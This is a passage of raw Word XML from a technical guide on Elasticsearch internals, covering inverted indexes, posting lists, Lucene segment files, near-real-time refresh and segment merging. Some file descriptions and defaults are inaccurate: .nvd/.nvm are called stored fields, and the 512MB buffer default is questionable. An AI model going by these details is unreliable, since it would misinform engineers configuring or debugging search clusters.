          <v:rect id="_x0000_i5960" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="089D3515" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part III: Elasticsearch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A2EA3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Elasticsearch Actually Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BABEC0C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Elasticsearch is a </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>distributed, full-text search and analytics engine built on Apache Lucene</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>, providing near-real-time search, relevance ranking, complex aggregations, and document storage at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8B511C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The "search engine" description undersells it. Elasticsearch is increasingly used as a general-purpose analytics database for log analysis, business intelligence, and operational dashboards — where its aggregation framework and full-text capabilities provide capabilities that traditional databases can't match efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3ADAF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Inverted Index — The Core Data Structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1AFEFE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How full-text search works at the storage level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B5501C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF02FC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Document 1: "The quick brown fox jumps over the lazy dog"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B25BF5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Document 2: "The fox ran quickly through the forest"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E9ABF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Document 3: "A lazy cat sat on the brown mat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25037BF0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="11B664E8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Forward index (traditional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D49CD09" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Doc 1 → [The, quick, brown, fox, jumps, over, the, lazy, dog]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334B80F3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Doc 2 → [The, fox, ran, quickly, through, the, forest]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729ECA55" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Doc 3 → [A, lazy, cat, sat, on, the, brown, mat]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C519D6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D036E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Lookup "fox" → must scan all documents → O(N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF960E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C06BAB6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Inverted index (Elasticsearch/Lucene):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79358E36" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "brown"   → [Doc 1, Doc 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169DB35E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "cat"     → [Doc 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6D977" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "dog"     → [Doc 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B018C8A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "forest"  → [Doc 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75794998" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "fox"     → [Doc 1, Doc 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490946A7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "jump"    → [Doc 1]     ← stemmed from "jumps"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E84705" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "lazy"    → [Doc 1, Doc 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F92FD6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "quick"   → [Doc 1, Doc 2]   ← "quickly" stemmed to "quick"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ACCDE0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "ran"     → [Doc 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A62FFDD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FE9F78" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Lookup "fox" → O(1) → [Doc 1, Doc 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D38A4CC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Lookup "fox AND lazy" → intersect([Doc 1, Doc 2], [Doc 1, Doc 3]) = [Doc 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7116F6A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19016EFD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Built with: term → sorted list of document IDs (posting list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B9F5F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EDF9F2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Extended posting list (with term frequency and position):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9A8B1D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  "fox" → [(Doc 1, freq=1, positions=[3]), (Doc 2, freq=1, positions=[1])]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D794FB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737B128F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Enables:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383ECB0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    TF-IDF/BM25 scoring (more occurrences → more relevant)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071BF5C8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Phrase queries ("brown fox" → must be adjacent positions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B0A4F7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Proximity queries ("fox" near "dog")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B5711F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lucene index structure — the physical implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C1807D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B0729" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Lucene index: collection of segments (immutable inverted index files)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFEA23D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="59A2B8D4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Segment: one complete inverted index for a subset of documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52997F78" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Segments are immutable once written</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC125B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B191F3F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Files within a segment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD0AD33" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .tim: term dictionary (all indexed terms, sorted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19913401" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .tip: term dictionary index (binary search index into .tim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284BFDC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .doc: document IDs for each term (posting lists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C14F49" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .pos: position information (for phrase/proximity queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B80CE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .pay: payloads (per-position metadata)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C593E25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .nvd: stored field values (the actual document content for _source)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1ED13" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .nvm: stored field index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E0F7BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .dvm: doc values (columnar stored values for sorting/aggregation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8C5DEF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .dvd: doc values data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC589D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .fdx, .fdt: stored fields (complete document JSON for retrieval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E0611D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    .fnm: field names metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFA8CD2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F934BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Document lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44686E5B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  1. Index document → written to in-memory buffer (IndexWriter buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755E6808" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  2. Buffer full (default 512MB) or refresh interval reached (default 1 second):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9E5FB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     → Create new segment (flush buffer to disk as immutable segment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79889763" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">     → New segment becomes searchable (near real-time, not immediate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08249C91" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  3. Background merge: many small segments → fewer large segments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9713DB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     (identical to LSM-Tree compaction conceptually)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E1A6B4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C521D5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Near-real-time search:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFA513" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    New document: searchable after next segment flush (default: ≤ 1 second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465C8253" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Not immediate: between write and flush, document is in buffer (not searchable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66007B5F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    index.refresh_interval: "1s" default, "-1" to disable auto-refresh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89E7D1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    POST /my-index/_refresh: manual refresh (force segment flush)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348F23E1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260383D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Segment merging (controlled by merge policy):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A83A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Many segments → slow search (must check all segments per query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B78A0E9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Background merge: Lucene merges small segments into larger ones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC1FA5D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Merge size tiers: small segments merged first, gradually merge into larger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE94F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595464F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  During merge: temporary 2× disk usage (old + new segments both present)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB70D3A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  After merge: old segments deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8363AF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93DC7B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Force merge (maintenance operation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257E4575" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    POST /my-index/_forcemerge?max_num_segments=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783B6D1F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Merges all segments into one → optimal read performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD63361" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Very expensive (reads/writes all data) → only for static indices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267DC01F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    During force merge: significant I/O and CPU usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41401B5C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
